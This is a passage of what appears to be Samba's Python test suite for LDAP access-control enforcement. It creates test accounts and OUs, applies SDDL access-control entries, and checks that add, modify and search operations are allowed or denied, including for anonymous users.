parser.print_usage()
sys.exit(1)
host = args[0]
if not "://" in host:
ldaphost = "ldap://%s" % host
else:
ldaphost = host
start = host.rindex("://")
host = host[start+3:]  # slice off the "scheme://" prefix (lstrip strips a character set, not a prefix, and rejects an int)
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
creds.set_gensec_features(creds.get_gensec_features() | gensec.FEATURE_SEAL)
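# Typical invocation (illustrative; the -U credentials option comes from
# samba.getopt's CredentialsOptions):
#   acl.py ldap://<dc-hostname> -U <username>%<password>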
#
# Tests start here
#
class AclTests(samba.tests.TestCase):
def setUp(self):
super(AclTests, self).setUp()
self.ldb_admin = ldb
self.base_dn = ldb.domain_dn()
self.domain_sid = security.dom_sid(ldb.get_domain_sid())
self.user_pass = "samba123@"
self.configuration_dn = self.ldb_admin.get_config_basedn().get_linearized()
self.sd_utils = sd_utils.SDUtils(ldb)
#used for anonymous login
self.creds_tmp = Credentials()
self.creds_tmp.set_username("")
self.creds_tmp.set_password("")
self.creds_tmp.set_domain(creds.get_domain())
self.creds_tmp.set_realm(creds.get_realm())
self.creds_tmp.set_workstation(creds.get_workstation())
print "baseDN: %s" % self.base_dn
def get_user_dn(self, name):
return "CN=%s,CN=Users,%s" % (name, self.base_dn)
def get_ldb_connection(self, target_username, target_password):
creds_tmp = Credentials()
creds_tmp.set_username(target_username)
creds_tmp.set_password(target_password)
creds_tmp.set_domain(creds.get_domain())
creds_tmp.set_realm(creds.get_realm())
creds_tmp.set_workstation(creds.get_workstation())
creds_tmp.set_gensec_features(creds_tmp.get_gensec_features()
| gensec.FEATURE_SEAL)
ldb_target = SamDB(url=ldaphost, credentials=creds_tmp, lp=lp)
return ldb_target
# Test if we have any additional groups for users than default ones
def assert_user_no_group_member(self, username):
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % self.get_user_dn(username))
try:
self.assertEqual(res[0]["memberOf"][0], "")
except KeyError:
pass
else:
self.fail()
# tests on LDAP add operations
class AclAddTests(AclTests):
def setUp(self):
super(AclAddTests, self).setUp()
# Domain admin that will be creator of OU parent-child structure
self.usr_admin_owner = "acl_add_user1"
# Second domain admin that will not be creator of OU parent-child structure
self.usr_admin_not_owner = "acl_add_user2"
# Regular user
self.regular_user = "acl_add_user3"
self.test_user1 = "test_add_user1"
self.test_group1 = "test_add_group1"
self.ou1 = "OU=test_add_ou1"
self.ou2 = "OU=test_add_ou2,%s" % self.ou1
self.ldb_admin.newuser(self.usr_admin_owner, self.user_pass)
self.ldb_admin.newuser(self.usr_admin_not_owner, self.user_pass)
self.ldb_admin.newuser(self.regular_user, self.user_pass)
# add admins to the Domain Admins group
self.ldb_admin.add_remove_group_members("Domain Admins", self.usr_admin_owner,
add_members_operation=True)
self.ldb_admin.add_remove_group_members("Domain Admins", self.usr_admin_not_owner,
add_members_operation=True)
self.ldb_owner = self.get_ldb_connection(self.usr_admin_owner, self.user_pass)
self.ldb_notowner = self.get_ldb_connection(self.usr_admin_not_owner, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.regular_user, self.user_pass)
def tearDown(self):
super(AclAddTests, self).tearDown()
delete_force(self.ldb_admin, "CN=%s,%s,%s" %
(self.test_user1, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "CN=%s,%s,%s" %
(self.test_group1, self.ou2, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou2, self.base_dn))
delete_force(self.ldb_admin, "%s,%s" % (self.ou1, self.base_dn))
delete_force(self.ldb_admin, self.get_user_dn(self.usr_admin_owner))
delete_force(self.ldb_admin, self.get_user_dn(self.usr_admin_not_owner))
delete_force(self.ldb_admin, self.get_user_dn(self.regular_user))
delete_force(self.ldb_admin, self.get_user_dn("test_add_anonymous"))
# Make sure top OU is deleted (and so everything under it)
def assert_top_ou_deleted(self):
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s,%s)" % (
"OU=test_add_ou1", self.base_dn))
self.assertEqual(len(res), 0)
def test_add_u1(self):
"""Testing OU with the rights of Doman Admin not creator of the OU """
self.assert_top_ou_deleted()
# Change descriptor for top level OU
self.ldb_owner.create_ou("OU=test_add_ou1," + self.base_dn)
self.ldb_owner.create_ou("OU=test_add_ou2,OU=test_add_ou1," + self.base_dn)
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.usr_admin_not_owner))
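# SDDL ACE sketch: D = deny, CI = container-inherit, WPCC = write-property
# plus create-child, and the trailing SID is the non-owner admin being denied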
mod = "(D;CI;WPCC;;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("OU=test_add_ou1," + self.base_dn, mod)
# Test user and group creation with another domain admin's credentials
self.ldb_notowner.newuser(self.test_user1, self.user_pass, userou=self.ou2)
self.ldb_notowner.newgroup("test_add_group1", groupou="OU=test_add_ou2,OU=test_add_ou1",
grouptype=4)
# Make sure we HAVE created the two objects -- user and group
# !!! We should not be able to do that; however, because of ACE ordering our inherited Deny ACE
# !!! comes after explicit (A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA) that comes from somewhere
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_user1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertTrue(len(res) > 0)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_group1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertTrue(len(res) > 0)
def test_add_u2(self):
"""Testing OU with the regular user that has no rights granted over the OU """
self.assert_top_ou_deleted()
# Create a parent-child OU structure with domain admin credentials
self.ldb_owner.create_ou("OU=test_add_ou1," + self.base_dn)
self.ldb_owner.create_ou("OU=test_add_ou2,OU=test_add_ou1," + self.base_dn)
# Test user and group creation with regular user credentials
try:
self.ldb_user.newuser(self.test_user1, self.user_pass, userou=self.ou2)
self.ldb_user.newgroup("test_add_group1", groupou="OU=test_add_ou2,OU=test_add_ou1",
grouptype=4)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
# Make sure we HAVEN'T created any of two objects -- user or group
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_user1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_group1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertEqual(len(res), 0)
def test_add_u3(self):
"""Testing OU with the rights of regular user granted the right 'Create User child objects' """
self.assert_top_ou_deleted()
# Change descriptor for top level OU
self.ldb_owner.create_ou("OU=test_add_ou1," + self.base_dn)
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.regular_user))
mod = "(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("OU=test_add_ou1," + self.base_dn, mod)
self.ldb_owner.create_ou("OU=test_add_ou2,OU=test_add_ou1," + self.base_dn)
# Test user and group creation with granted user only to one of the objects
self.ldb_user.newuser(self.test_user1, self.user_pass, userou=self.ou2, setpassword=False)
try:
self.ldb_user.newgroup("test_add_group1", groupou="OU=test_add_ou2,OU=test_add_ou1",
grouptype=4)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
# Make sure we HAVE created the one of two objects -- user
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s,%s)" %
("CN=test_add_user1,OU=test_add_ou2,OU=test_add_ou1",
self.base_dn))
self.assertNotEqual(len(res), 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s,%s)" %
("CN=test_add_group1,OU=test_add_ou2,OU=test_add_ou1",
self.base_dn) )
self.assertEqual(len(res), 0)
def test_add_u4(self):
""" 4 Testing OU with the rights of Doman Admin creator of the OU"""
self.assert_top_ou_deleted()
self.ldb_owner.create_ou("OU=test_add_ou1," + self.base_dn)
self.ldb_owner.create_ou("OU=test_add_ou2,OU=test_add_ou1," + self.base_dn)
self.ldb_owner.newuser(self.test_user1, self.user_pass, userou=self.ou2)
self.ldb_owner.newgroup("test_add_group1", groupou="OU=test_add_ou2,OU=test_add_ou1",
grouptype=4)
# Make sure we have successfully created the two objects -- user and group
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s,%s)" % ("CN=test_add_user1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertTrue(len(res) > 0)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s,%s)" % ("CN=test_add_group1,OU=test_add_ou2,OU=test_add_ou1", self.base_dn))
self.assertTrue(len(res) > 0)
def test_add_anonymous(self):
"""Test add operation with anonymous user"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
try:
anonymous.newuser("test_add_anonymous", self.user_pass)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
# tests on LDAP modify operations
class AclModifyTests(AclTests):
def setUp(self):
super(AclModifyTests, self).setUp()
self.user_with_wp = "acl_mod_user1"
self.user_with_sm = "acl_mod_user2"
self.user_with_group_sm = "acl_mod_user3"
self.ldb_admin.newuser(self.user_with_wp, self.user_pass)
self.ldb_admin.newuser(self.user_with_sm, self.user_pass)
self.ldb_admin.newuser(self.user_with_group_sm, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.user_with_wp, self.user_pass)
self.ldb_user2 = self.get_ldb_connection(self.user_with_sm, self.user_pass)
self.ldb_user3 = self.get_ldb_connection(self.user_with_group_sm, self.user_pass)
self.user_sid = self.sd_utils.get_object_sid( self.get_user_dn(self.user_with_wp))
self.ldb_admin.newgroup("test_modify_group2", grouptype=4)
self.ldb_admin.newgroup("test_modify_group3", grouptype=4)
self.ldb_admin.newuser("test_modify_user2", self.user_pass)
def tearDown(self):
super(AclModifyTests, self).tearDown()
delete_force(self.ldb_admin, self.get_user_dn("test_modify_user1"))
delete_force(self.ldb_admin, "CN=test_modify_group1,CN=Users," + self.base_dn)
delete_force(self.ldb_admin, "CN=test_modify_group2,CN=Users," + self.base_dn)
delete_force(self.ldb_admin, "CN=test_modify_group3,CN=Users," + self.base_dn)
delete_force(self.ldb_admin, "OU=test_modify_ou1," + self.base_dn)
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_wp))
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_sm))
delete_force(self.ldb_admin, self.get_user_dn(self.user_with_group_sm))
delete_force(self.ldb_admin, self.get_user_dn("test_modify_user2"))
delete_force(self.ldb_admin, self.get_user_dn("test_anonymous"))
def test_modify_u1(self):
"""5 Modify one attribute if you have DS_WRITE_PROPERTY for it"""
mod = "(OA;;WP;bf967953-0de6-11d0-a285-00aa003049e2;;%s)" % str(self.user_sid)
# First test object -- User
print "Testing modify on User object"
self.ldb_admin.newuser("test_modify_user1", self.user_pass)
self.sd_utils.dacl_add_ace(self.get_user_dn("test_modify_user1"), mod)
ldif = """
dn: """ + self.get_user_dn("test_modify_user1") + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % self.get_user_dn("test_modify_user1"))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Second test object -- Group
print "Testing modify on Group object"
self.ldb_admin.newgroup("test_modify_group1", grouptype=4)
self.sd_utils.dacl_add_ace("CN=test_modify_group1,CN=Users," + self.base_dn, mod)
ldif = """
dn: CN=test_modify_group1,CN=Users,""" + self.base_dn + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % str("CN=test_modify_group1,CN=Users," + self.base_dn))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Third test object -- Organizational Unit
print "Testing modify on OU object"
#delete_force(self.ldb_admin, "OU=test_modify_ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=test_modify_ou1," + self.base_dn)
self.sd_utils.dacl_add_ace("OU=test_modify_ou1," + self.base_dn, mod)
ldif = """
dn: OU=test_modify_ou1,""" + self.base_dn + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % str("OU=test_modify_ou1," + self.base_dn))
self.assertEqual(res[0]["displayName"][0], "test_changed")
def test_modify_u2(self):
"""6 Modify two attributes as you have DS_WRITE_PROPERTY granted only for one of them"""
mod = "(OA;;WP;bf967953-0de6-11d0-a285-00aa003049e2;;%s)" % str(self.user_sid)
# First test object -- User
print "Testing modify on User object"
#delete_force(self.ldb_admin, self.get_user_dn("test_modify_user1"))
self.ldb_admin.newuser("test_modify_user1", self.user_pass)
self.sd_utils.dacl_add_ace(self.get_user_dn("test_modify_user1"), mod)
# Modify on attribute you have rights for
ldif = """
dn: """ + self.get_user_dn("test_modify_user1") + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" %
self.get_user_dn("test_modify_user1"))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Modify on attribute you do not have rights for granted
ldif = """
dn: """ + self.get_user_dn("test_modify_user1") + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
# Second test object -- Group
print "Testing modify on Group object"
self.ldb_admin.newgroup("test_modify_group1", grouptype=4)
self.sd_utils.dacl_add_ace("CN=test_modify_group1,CN=Users," + self.base_dn, mod)
ldif = """
dn: CN=test_modify_group1,CN=Users,""" + self.base_dn + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" %
str("CN=test_modify_group1,CN=Users," + self.base_dn))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Modify on attribute you do not have rights for granted
ldif = """
dn: CN=test_modify_group1,CN=Users,""" + self.base_dn + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
# Third test object -- Organizational Unit
print "Testing modify on OU object"
self.ldb_admin.create_ou("OU=test_modify_ou1," + self.base_dn)
self.sd_utils.dacl_add_ace("OU=test_modify_ou1," + self.base_dn, mod)
ldif = """
dn: OU=test_modify_ou1,""" + self.base_dn + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % str("OU=test_modify_ou1,"
+ self.base_dn))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Modify on attribute you do not have rights for granted
ldif = """
dn: OU=test_modify_ou1,""" + self.base_dn + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
def test_modify_u3(self):
"""7 Modify one attribute as you have no what so ever rights granted"""
# First test object -- User
print "Testing modify on User object"
self.ldb_admin.newuser("test_modify_user1", self.user_pass)
# Modify on attribute you do not have rights for granted
ldif = """
dn: """ + self.get_user_dn("test_modify_user1") + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
# Second test object -- Group
print "Testing modify on Group object"
self.ldb_admin.newgroup("test_modify_group1", grouptype=4)
# Modify on attribute you do not have rights for granted
ldif = """
dn: CN=test_modify_group1,CN=Users,""" + self.base_dn + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
# Third test object -- Organizational Unit
print "Testing modify on OU object"
#delete_force(self.ldb_admin, "OU=test_modify_ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=test_modify_ou1," + self.base_dn)
# Modify on attribute you do not have rights for granted
ldif = """
dn: OU=test_modify_ou1,""" + self.base_dn + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
def test_modify_u4(self):
"""11 Grant WP to PRINCIPAL_SELF and test modify"""
ldif = """
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
add: adminDescription
adminDescription: blah blah blah"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
mod = "(OA;;WP;bf967919-0de6-11d0-a285-00aa003049e2;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
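# "PS" abbreviates the Principal-Self well-known SID, so the ACE grants
# WRITE_PROPERTY to the object itself; the GUID is assumed here to be the
# schemaIDGUID of the adminDescription attribute being modified.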
# Modify on attribute you have rights for
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" \
% self.get_user_dn(self.user_with_wp), attrs=["adminDescription"] )
self.assertEqual(res[0]["adminDescription"][0], "blah blah blah")
def test_modify_u5(self):
"""12 test self membership"""
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: """ + self.get_user_dn(self.user_with_sm)
#the user has no rights granted, this should fail
try:
self.ldb_user2.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
#grant self-membership, should be able to add himself
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.user_with_sm))
mod = "(OA;;SW;bf9679c0-0de6-11d0-a285-00aa003049e2;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("CN=test_modify_group2,CN=Users," + self.base_dn, mod)
self.ldb_user2.modify_ldif(ldif)
res = self.ldb_admin.search( self.base_dn, expression="(distinguishedName=%s)" \
% ("CN=test_modify_group2,CN=Users," + self.base_dn), attrs=["Member"])
self.assertEqual(res[0]["Member"][0], self.get_user_dn(self.user_with_sm))
#but not other users
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: CN=test_modify_user2,CN=Users,""" + self.base_dn
try:
self.ldb_user2.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_modify_u6(self):
"""13 test self membership"""
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: """ + self.get_user_dn(self.user_with_sm) + """
Member: CN=test_modify_user2,CN=Users,""" + self.base_dn
#grant self-membership, should be able to add himself but not others at the same time
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.user_with_sm))
mod = "(OA;;SW;bf9679c0-0de6-11d0-a285-00aa003049e2;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("CN=test_modify_group2,CN=Users," + self.base_dn, mod)
try:
self.ldb_user2.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_modify_u7(self):
"""13 User with WP modifying Member"""
#a second user is given write property permission
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.user_with_wp))
mod = "(A;;WP;;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("CN=test_modify_group2,CN=Users," + self.base_dn, mod)
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: """ + self.get_user_dn(self.user_with_wp)
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search( self.base_dn, expression="(distinguishedName=%s)" \
% ("CN=test_modify_group2,CN=Users," + self.base_dn), attrs=["Member"])
self.assertEqual(res[0]["Member"][0], self.get_user_dn(self.user_with_wp))
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
delete: Member"""
self.ldb_user.modify_ldif(ldif)
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: CN=test_modify_user2,CN=Users,""" + self.base_dn
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search( self.base_dn, expression="(distinguishedName=%s)" \
% ("CN=test_modify_group2,CN=Users," + self.base_dn), attrs=["Member"])
self.assertEqual(res[0]["Member"][0], "CN=test_modify_user2,CN=Users," + self.base_dn)
def test_modify_anonymous(self):
"""Test add operation with anonymous user"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
self.ldb_admin.newuser("test_anonymous", "samba123@")
m = Message()
m.dn = Dn(anonymous, self.get_user_dn("test_anonymous"))
m["description"] = MessageElement("sambauser2",
FLAG_MOD_ADD,
"description")
try:
anonymous.modify(m)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
#tests on ldap search operations (enable these when search is implemented)
class AclSearchTests(AclTests):
def setUp(self):
super(AclSearchTests, self).setUp()
self.u1 = "search_u1"
self.u2 = "search_u2"
self.u3 = "search_u3"
self.group1 = "group1"
self.ldb_admin.newuser(self.u1, self.user_pass)
self.ldb_admin.newuser(self.u2, self.user_pass)
self.ldb_admin.newuser(self.u3, self.user_pass)
self.ldb_admin.newgroup(self.group1, grouptype=-2147483646)
self.ldb_admin.add_remove_group_members(self.group1, self.u2,
add_members_operation=True)
self.ldb_user = self.get_ldb_connection(self.u1, self.user_pass)
self.ldb_user2 = self.get_ldb_connection(self.u2, self.user_pass)
self.ldb_user3 = self.get_ldb_connection(self.u3, self.user_pass)
self.full_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou3,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou4,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)]
self.user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.u1))
self.group_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.group1))
def create_clean_ou(self, object_dn):
""" Base repeating setup for unittests to follow """
res = self.ldb_admin.search(base=self.base_dn, scope=SCOPE_SUBTREE, \
expression="distinguishedName=%s" % object_dn)
# Make sure top testing OU has been deleted before starting the test
self.assertEqual(len(res), 0)
self.ldb_admin.create_ou(object_dn)
desc_sddl = self.sd_utils.get_sd_as_sddl(object_dn)
# Make sure there are inheritable ACEs initially
self.assertTrue("CI" in desc_sddl or "OI" in desc_sddl)
# Find and remove all inherit ACEs
res = re.findall("\(.*?\)", desc_sddl)
res = [x for x in res if ("CI" in x) or ("OI" in x)]
for x in res:
desc_sddl = desc_sddl.replace(x, "")
# Add the 'P' (protected) flag to the DACL and SACL so no inheritable
# ACEs can propagate from above; the replace below turns ":AI" into ":AIP"
desc_sddl = desc_sddl.replace(":AI", ":AIP")
self.sd_utils.modify_sd_on_dn(object_dn, desc_sddl)
# Verify all inheritable ACEs are gone
desc_sddl = self.sd_utils.get_sd_as_sddl(object_dn)
self.assertFalse("CI" in desc_sddl)
self.assertFalse("OI" in desc_sddl)
def tearDown(self):
super(AclSearchTests, self).tearDown()
delete_force(self.ldb_admin, "OU=test_search_ou2,OU=test_search_ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=test_search_ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou4,OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou3,OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, self.get_user_dn("search_u1"))
delete_force(self.ldb_admin, self.get_user_dn("search_u2"))
delete_force(self.ldb_admin, self.get_user_dn("search_u3"))
delete_force(self.ldb_admin, self.get_user_dn("group1"))
def test_search_anonymous1(self):
"""Verify access of rootDSE with the correct request"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
res = anonymous.search("", expression="(objectClass=*)", scope=SCOPE_BASE)
self.assertEquals(len(res), 1)
#verify the presence of some of the attributes
#we don't care about their values
self.assertTrue("ldapServiceName" in res[0])
self.assertTrue("namingContexts" in res[0])
self.assertTrue("isSynchronized" in res[0])
self.assertTrue("dsServiceName" in res[0])
self.assertTrue("supportedSASLMechanisms" in res[0])
self.assertTrue("isGlobalCatalogReady" in res[0])
self.assertTrue("domainControllerFunctionality" in res[0])
self.assertTrue("serverName" in res[0])
def test_search_anonymous2(self):
"""Make sure we cannot access anything else"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
try:
res = anonymous.search("", expression="(objectClass=*)", scope=SCOPE_SUBTREE)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
try:
res = anonymous.search(self.base_dn, expression="(objectClass=*)", scope=SCOPE_SUBTREE)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
try:
res = anonymous.search("CN=Configuration," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
def test_search_anonymous3(self):
"""Set dsHeuristics and repeat"""
self.ldb_admin.set_dsheuristics("0000002")
self.ldb_admin.create_ou("OU=test_search_ou1," + self.base_dn)
mod = "(A;CI;LC;;;AN)"
self.sd_utils.dacl_add_ace("OU=test_search_ou1," + self.base_dn, mod)
self.ldb_admin.create_ou("OU=test_search_ou2,OU=test_search_ou1," + self.base_dn)
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
res = anonymous.search("OU=test_search_ou2,OU=test_search_ou1," + self.base_dn,
expression="(objectClass=*)", scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 1)
self.assertTrue("dn" in res[0])
self.assertTrue(res[0]["dn"] == Dn(self.ldb_admin,
"OU=test_search_ou2,OU=test_search_ou1," + self.base_dn))
res = anonymous.search("CN=Configuration," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 1)
self.assertTrue("dn" in res[0])
self.assertTrue(res[0]["dn"] == Dn(self.ldb_admin, self.configuration_dn))
def test_search1(self):
"""Make sure users can see us if given LC to user and group"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;;LC;;;%s)(A;;LC;;;%s)" % (str(self.user_sid), str(self.group_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
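# The explicit descriptor grants a broad right set to Domain Admins ("DA")
# plus the LC ACEs from 'mod'; since create_clean_ou() stripped inheritable
# ACEs from ou1, visibility of these child OUs is governed solely by the
# explicit ACEs set at creation time.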
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
#regular users must see only ou1 and ou2
res = self.ldb_user3.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 2)
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn)]
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
#these users should see all ous
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 6)
